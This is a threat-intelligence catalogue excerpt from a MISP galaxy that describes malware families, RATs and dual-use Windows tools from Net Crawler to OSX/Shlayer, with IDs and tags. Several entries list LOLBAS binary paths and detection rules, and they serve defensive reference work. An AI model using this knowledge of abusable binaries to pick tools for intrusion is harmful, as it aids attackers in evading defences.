tags | ['c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'cd1b5d44-226e-4405-8985-800492cf2865', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '4e7ae33d-e040-4618-bccf-3b5e4aac81ed', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Net Crawler
Net Crawler is an intranet worm capable of extracting credentials using credential dumpers and spreading to systems on a network over SMB by brute forcing accounts with recovered passwords and using PsExec to execute a copy of Net Crawler. [Cylance Cleaver]
Internal MISP references
UUID 947c6212-4da8-48dd-9da9-ce4b077dd759
which can be used as unique global reference for Net Crawler
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0056 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
NETEAGLE
NETEAGLE is a backdoor developed by APT30 with compile dates as early as 2008. It has two main variants known as “Scout” and “Norton.” [FireEye APT30]
Internal MISP references
UUID 852c300d-9313-442d-9b49-9883522c3f4b
which can be used as unique global reference for NETEAGLE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0034 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
netsh
netsh is a scripting utility used to interact with networking components on local or remote systems. [TechNet Netsh]
Internal MISP references
UUID 803192b8-747b-4108-ae15-2d7481d39162
which can be used as unique global reference for netsh
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0108 |
source | MITRE |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '064dc489-6b50-4cc1-bb9b-fe722f21aaf1', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '303a3675-4855-4323-b042-95bb1d907cca', '84615fe0-c2a5-4e07-8957-78ebc29b4635', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
netstat
netstat is an operating system utility that displays active TCP connections, listening ports, and network statistics. [TechNet Netstat]
Internal MISP references
UUID 132fb908-9f13-4bcf-aa64-74cbc72f5491
which can be used as unique global reference for netstat
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0104 |
source | MITRE |
tags | ['758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
NetSupport
NetSupport is a legitimate utility that has been long-used for remote management and monitoring (RMM) purposes. In recent years, it has been heavily abused by threat actors for maintaining persistent remote access to victim systems.[The DFIR Report NetSupport October 30 2023]
Internal MISP references
UUID 96ecdb59-b047-4557-b2a7-c9712e8c903b
which can be used as unique global reference for NetSupport
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S5320 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
NetTraveler
NetTraveler is malware that has been used in multiple cyber espionage campaigns for basic surveillance of victims. The earliest known samples have timestamps back to 2005, and the largest number of observed samples were created between 2010 and 2013. [Kaspersky NetTraveler]
Internal MISP references
UUID 1b8f9cf9-db8f-437d-800e-5ddd090fe30d
which can be used as unique global reference for NetTraveler
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0033 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Netwalker
Netwalker is fileless ransomware written in PowerShell and executed directly in memory.[TrendMicro Netwalker May 2020]
Internal MISP references
UUID 5b4b395f-f61a-4bd6-94c1-fb45ed3cd13d
which can be used as unique global reference for Netwalker
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0457 |
source | MITRE |
tags | ['89c5b94b-ecf4-4d53-9b74-3465086d4565', '562e535e-19f5-4d6c-81ed-ce2aec544f09', '242bc007-5ac5-4d96-8638-699a06d06d24', 'e554bd60-5de3-4162-9ed3-66073ae9d6b3', '0e948c57-6c10-4576-ad27-9832cc2af3a1', '3d90eed2-862d-4f61-8c8f-0b8da3e45af0', '2743d495-7728-4a75-9e5f-b64854039792', '4fb4824e-1995-4c65-8c71-e818c0aa1086', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
NETWIRE
NETWIRE is a publicly available, multiplatform remote administration tool (RAT) that has been used by criminal and APT groups since at least 2012.[FireEye APT33 Sept 2017][McAfee Netwire Mar 2015][FireEye APT33 Webinar Sept 2017]
Internal MISP references
UUID c7d0e881-80a1-49ea-9c1f-b6e53cf399a8
which can be used as unique global reference for NETWIRE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S0198 |
source | MITRE |
tags | ['6c6c0125-9631-4c2c-90ab-cfef374d5198'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Network Scanner
Network Scanner (NS.exe) is a utility that can be used to enumerate file shares within a given environment.[The DFIR Report Dharma Ransomware June 2020]
Internal MISP references
UUID 56018455-7644-4e59-845a-986f55efcad4
which can be used as unique global reference for Network Scanner
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5278 |
source | Tidal Cyber |
tags | ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', 'cd1b5d44-226e-4405-8985-800492cf2865', 'e1af18e3-3224-4e4c-9d0f-533768474508'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
NGLite
NGLite is a backdoor Trojan that is only capable of running commands received through its C2 channel. While the capabilities are standard for a backdoor, NGLite uses a novel C2 channel that leverages a decentralized network based on the legitimate NKN to communicate between the backdoor and the actors.[NGLite Trojan]
Internal MISP references
UUID 48b161fe-3ae1-5551-9f26-d6f2d6b5afb9
which can be used as unique global reference for NGLite
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1106 |
source | MITRE |
type | ['malware'] |
ngrok
ngrok is a legitimate reverse proxy tool that can create a secure tunnel to servers located behind firewalls or on local machines that do not have a public IP. ngrok has been leveraged by threat actors in several campaigns including use for lateral movement and data exfiltration.[Zdnet Ngrok September 2018][FireEye Maze May 2020][Cyware Ngrok May 2019][MalwareBytes LazyScripter Feb 2021]
Internal MISP references
UUID 316ecd9d-ac0b-58c7-8083-5d9214c770f6
which can be used as unique global reference for ngrok
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0508 |
source | MITRE |
tags | ['c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', '6070668f-1cbd-4878-8066-c636d1d8659c', 'd8f7e071-fbfd-46f8-b431-e241bb1513ac', 'd75c1a80-0cb8-4a64-8379-10514cd44b1e', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', 'febea5b6-2ea2-402b-8bec-f3f5b3f73c59'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Nidiran
Nidiran is a custom backdoor developed and used by Suckfly. It has been delivered via strategic web compromise. [Symantec Suckfly March 2016]
Internal MISP references
UUID 3ae9acd7-39f8-45c6-b557-c7d9a40eed2c
which can be used as unique global reference for Nidiran
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0118 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
NightClub
NightClub is a modular implant written in C++ that has been used by MoustachedBouncer since at least 2014.[MoustachedBouncer ESET August 2023]
Internal MISP references
UUID b1963876-dbdc-5beb-ace3-acb6d7705543
which can be used as unique global reference for NightClub
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1090 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Ninja
Ninja is a malware developed in C++ that has been used by ToddyCat to penetrate networks and control remote systems since at least 2020. Ninja is possibly part of a post exploitation toolkit exclusively used by ToddyCat and allows multiple operators to work simultaneously on the same machine. Ninja has been used against government and military entities in Europe and Asia and observed in specific infection chains being deployed by Samurai.[Kaspersky ToddyCat June 2022]
Internal MISP references
UUID 2dd26ff0-22d6-591b-9054-78e84fa3e05c
which can be used as unique global reference for Ninja
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1100 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
NirSoft
NirSoft is a self-described "freeware" utility that can be used to recover passwords.[NirSoft Website] According to U.S. cybersecurity authorities, ransomware actors such as those associated with the Royal ransomware operation have used the NirSoft utility to harvest passwords for malicious purposes.[#StopRansomware: Royal Ransomware | CISA]
Internal MISP references
UUID efa5fff4-f6db-4719-91c7-97dbe93099a8
which can be used as unique global reference for NirSoft
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5271 |
source | Tidal Cyber |
tags | ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
njRAT
njRAT is a remote access tool (RAT) that was first observed in 2012. It has been used by threat actors in the Middle East.[Fidelis njRAT June 2013]
Internal MISP references
UUID 82996f6f-0575-45cd-8f7c-ba1b063d5b9f
which can be used as unique global reference for njRAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0385 |
source | MITRE |
tags | ['16b47583-1c54-431f-9f09-759df7b5ddb7', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
NKAbuse
NKAbuse is a Go-based, multi-platform malware abusing NKN (New Kind of Network) technology for data exchange between peers, functioning as a potent implant, and equipped with both flooder and backdoor capabilities.[NKAbuse BC][NKAbuse SL]
Internal MISP references
UUID e26988e0-e755-54a4-8234-e8f961266d82
which can be used as unique global reference for NKAbuse
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S1107 |
source | MITRE |
type | ['malware'] |
Nltest
Nltest is a Windows command-line utility used to list domain controllers and enumerate domain trusts.[Nltest Manual]
Internal MISP references
UUID fbb1546a-f288-4e43-9e5c-14c94423c4f6
which can be used as unique global reference for Nltest
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0359 |
source | MITRE |
tags | ['c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', '24f6ba0e-9230-4410-a9fb-b0f3b55de326', '15787198-6c8b-4f79-bf50-258d55072fee', 'cd1b5d44-226e-4405-8985-800492cf2865', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Nmap
According to its project website, "Nmap ("Network Mapper") is a free and open source utility for network discovery and security auditing".[Nmap: the Network Mapper]
Internal MISP references
UUID 042e61cf-a8e1-42ec-8974-a3b2e2037c08
which can be used as unique global reference for Nmap
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5051 |
source | Tidal Cyber |
tags | ['ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '6ff40d11-214a-434b-b137-993e4ff5e34e', '15787198-6c8b-4f79-bf50-258d55072fee', 'cd1b5d44-226e-4405-8985-800492cf2865'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
NOKKI
NOKKI is a modular remote access tool. The earliest observed attack using NOKKI was in January 2018. NOKKI has significant code overlap with the KONNI malware family. There is some evidence potentially linking NOKKI to APT37.[Unit 42 NOKKI Sept 2018][Unit 42 Nokki Oct 2018]
Internal MISP references
UUID 31aa0433-fb6b-4290-8af5-a0d0c6c18548
which can be used as unique global reference for NOKKI
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0353 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
NotPetya
NotPetya is malware that was used by Sandworm Team in a worldwide attack starting on June 27, 2017. While NotPetya appears as a form of ransomware, its main purpose was to destroy data and disk structures on compromised systems; the attackers never intended to make the encrypted data recoverable. As such, NotPetya may be more appropriately thought of as a form of wiper malware. NotPetya contains worm-like features to spread itself across a computer network using the SMBv1 exploits EternalBlue and EternalRomance.[Talos Nyetya June 2017][US-CERT NotPetya 2017][ESET Telebots June 2017][US District Court Indictment GRU Unit 74455 October 2020]
Internal MISP references
UUID 2538e0fe-1290-4ae1-aef9-e55d83c9eb23
which can be used as unique global reference for NotPetya
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0368 |
source | MITRE |
tags | ['3ed3f7a6-b446-4fbc-a433-ff1d63c0e647', '09de661e-60c4-43fb-bfef-df017215d1d8', '5a463cb3-451d-47f7-93e4-1886150697ce', 'c2380542-36f2-4922-9ed2-80ced06645c9', '7e7b0c67-bb85-4996-a289-da0e792d7172', 'e809d252-12cc-494d-94f5-954c49eb87ce'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Npcap
According to its project website, "Npcap is the Nmap Project's packet capture (and sending) library for Microsoft Windows".[Npcap: Windows Packet Capture Library & Driver] Nmap is a utility used for network discovery and security auditing.
Internal MISP references
UUID d1817595-9186-4749-aeab-26c774c1885d
which can be used as unique global reference for Npcap
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5052 |
source | Tidal Cyber |
tags | ['15787198-6c8b-4f79-bf50-258d55072fee', 'cd1b5d44-226e-4405-8985-800492cf2865'] |
type | ['tool'] |
Ntdsutil
Ntdsutil is a Windows command-line tool "that provides management facilities for Active Directory Domain Services (AD DS) and Active Directory Lightweight Directory Services (AD LDS)."[Ntdsutil Microsoft]
Internal MISP references
UUID 9af571bb-f3c7-434b-8187-3e4ceb0ec6fc
which can be used as unique global reference for Ntdsutil
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5018 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '1da5eb1e-7ac5-4284-99cb-ce227cad8983', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
ObliqueRAT
ObliqueRAT is a remote access trojan, similar to Crimson, that has been in use by Transparent Tribe since at least 2020.[Talos Oblique RAT March 2021][Talos Transparent Tribe May 2021]
Internal MISP references
UUID 97e8148c-e146-444c-9de5-6e2fdbda2f9f
which can be used as unique global reference for ObliqueRAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0644 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
OceanSalt
OceanSalt is a Trojan that was used in a campaign targeting victims in South Korea, United States, and Canada. OceanSalt shares code similarity with SpyNote RAT, which has been linked to APT1.[McAfee Oceansalt Oct 2018]
Internal MISP references
UUID f1723994-058b-4525-8e11-2f0c80d8f3a4
which can be used as unique global reference for OceanSalt
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0346 |
source | MITRE |
type | ['malware'] |
Octopus
Octopus is a Windows Trojan written in the Delphi programming language that has been used by Nomadic Octopus to target government organizations in Central Asia since at least 2014.[Securelist Octopus Oct 2018][Security Affairs DustSquad Oct 2018][ESET Nomadic Octopus 2018]
Internal MISP references
UUID 8f04e609-8773-4529-b247-d32f530cc453
which can be used as unique global reference for Octopus
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0340 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Odbcconf
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used in Windows for managing ODBC connections
Author: Oddvar Moe
Paths: * C:\Windows\System32\odbcconf.exe * C:\Windows\SysWOW64\odbcconf.exe
Resources: * https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b * https://github.com/woanware/application-restriction-bypasses * https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/
Detection: * Sigma: proc_creation_win_odbcconf_response_file.yml * Sigma: proc_creation_win_odbcconf_response_file_susp.yml * Elastic: defense_evasion_unusual_process_network_connection.toml * Elastic: defense_evasion_network_connection_from_windows_binary.toml[LOLBAS Odbcconf]
Internal MISP references
UUID 5e434819-7f4a-440c-a9bd-7675c0218be1
which can be used as unique global reference for Odbcconf
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5134 |
source | Tidal Cyber |
tags | ['64825d12-3cd6-4446-a93c-ff7d8ec13dc8', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
OfflineScannerShell
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows Defender Offline Shell
Author: Elliot Killick
Paths: * C:\Program Files\Windows Defender\Offline\OfflineScannerShell.exe
Resources: None Provided
Detection: * Sigma: proc_creation_win_lolbas_offlinescannershell.yml * IOC: OfflineScannerShell.exe should not be run on a normal workstation[OfflineScannerShell.exe - LOLBAS Project]
Internal MISP references
UUID 8bc7c62a-110d-451b-9ca6-bc48a13e72d4
which can be used as unique global reference for OfflineScannerShell
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5135 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Okrum
Okrum is a Windows backdoor that has been seen in use since December 2016 with strong links to Ke3chang.[ESET Okrum July 2019]
Internal MISP references
UUID f9bcf0a1-f287-44ec-8f53-6859d41e041c
which can be used as unique global reference for Okrum
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0439 |
source | MITRE |
tags | ['8bf128ad-288b-41bc-904f-093f4fdde745'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
OLDBAIT
OLDBAIT is a credential harvester used by APT28. [FireEye APT28] [FireEye APT28 January 2017]
Internal MISP references
UUID 479814e2-2656-4ea2-9e79-fcdb818f703e
which can be used as unique global reference for OLDBAIT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0138 |
source | MITRE |
tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Olympic Destroyer
Olympic Destroyer is malware that was used by Sandworm Team against the 2018 Winter Olympics, held in Pyeongchang, South Korea. The main purpose of the malware was to render infected computer systems inoperable. The malware leverages various native Windows utilities and API calls to carry out its destructive tasks. Olympic Destroyer has worm-like features to spread itself across a computer network in order to maximize its destructive impact.[Talos Olympic Destroyer 2018][US District Court Indictment GRU Unit 74455 October 2020]
Internal MISP references
UUID 073b5288-11d6-4db0-9f2c-a1816847d15c
which can be used as unique global reference for Olympic Destroyer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0365 |
source | MITRE |
tags | ['e809d252-12cc-494d-94f5-954c49eb87ce'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
OneDriveStandaloneUpdater
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: OneDrive Standalone Updater
Author: Elliot Killick
Paths: * %localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
Resources: * https://github.com/LOLBAS-Project/LOLBAS/pull/153
Detection: * IOC: HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC being set to a suspicious non-Microsoft controlled URL * IOC: Reports of downloading from suspicious URLs in %localappdata%\OneDrive\setup\logs\StandaloneUpdate_*.log files * Sigma: registry_set_lolbin_onedrivestandaloneupdater.yml[OneDriveStandaloneUpdater.exe - LOLBAS Project]
Internal MISP references
UUID 49ef42bc-0958-4b61-9593-a4af69432410
which can be used as unique global reference for OneDriveStandaloneUpdater
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5136 |
source | Tidal Cyber |
tags | ['b6116080-8fbf-4e9f-9206-20b025f2cf23', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
OnionDuke
OnionDuke is malware that was used by APT29 from 2013 to 2015. [F-Secure The Dukes]
Internal MISP references
UUID 6056bf36-fb45-498d-a285-5f98ae08b090
which can be used as unique global reference for OnionDuke
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0052 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
OopsIE
OopsIE is a Trojan used by OilRig to remotely execute commands as well as upload/download files to/from victims. [Unit 42 OopsIE! Feb 2018]
Internal MISP references
UUID 4f1894d4-d085-4348-af50-dfda257a9e18
which can be used as unique global reference for OopsIE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0264 |
source | MITRE |
tags | ['8bf128ad-288b-41bc-904f-093f4fdde745'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
OpenConsole
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Console Window host for Windows Terminal
Author: Nasreddine Bencherchali
Paths: * C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os64\OpenConsole.exe * C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os86\OpenConsole.exe * C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os64\OpenConsole.exe
Resources: * https://twitter.com/nas_bench/status/1537563834478645252
Detection: * IOC: OpenConsole.exe spawning unexpected processes * Sigma: proc_creation_win_lolbin_openconsole.yml[OpenConsole.exe - LOLBAS Project]
Internal MISP references
UUID 54030309-671d-4e4b-b9c0-619cd07f5e05
which can be used as unique global reference for OpenConsole
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5230 |
source | Tidal Cyber |
tags | ['1dd2d703-fed1-41d2-9843-7b276ef3d6f2', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
OpenSSH
OpenSSH is a publicly available tool for traffic encryption and remote login using the Secure Shell ("SSH") protocol. According to its project website, it also "provides a large suite of secure tunneling capabilities, several authentication methods, and sophisticated configuration options".[OpenSSH Project Page]
Internal MISP references
UUID 5edec691-d2f1-4928-a12d-1ff59ba959a6
which can be used as unique global reference for OpenSSH
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5273 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', '2feda37d-5579-4102-a073-aa02e82cb49f', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'febea5b6-2ea2-402b-8bec-f3f5b3f73c59', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Orz
Orz is a custom JavaScript backdoor used by Leviathan. It was observed being used in 2014 as well as in August 2017 when it was dropped by Microsoft Publisher files. [Proofpoint Leviathan Oct 2017] [FireEye Periscope March 2018]
Internal MISP references
UUID 45a52a29-00c0-458a-b705-1040e06a43f2
which can be used as unique global reference for Orz
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0229 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
OSInfo
OSInfo is a custom tool used by APT3 to do internal discovery on a victim's computer and network. [Symantec Buckeye]
Internal MISP references
UUID fa1e13b8-2fb7-42e8-b630-25f0edfbca65
which can be used as unique global reference for OSInfo
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0165 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
OSX_OCEANLOTUS.D
OSX_OCEANLOTUS.D is a macOS backdoor used by APT32. First discovered in 2015, APT32 has continued to make improvements using a plugin architecture to extend capabilities, specifically using .dylib
files. OSX_OCEANLOTUS.D can also determine it's permission level and execute according to access type (root
or user
).[Unit42 OceanLotus 2017][TrendMicro MacOS April 2018][Trend Micro MacOS Backdoor November 2020]
Internal MISP references
UUID a45904b5-0ada-4567-be4c-947146c7f574
which can be used as unique global reference for OSX_OCEANLOTUS.D
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S0352 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
OSX/Shlayer
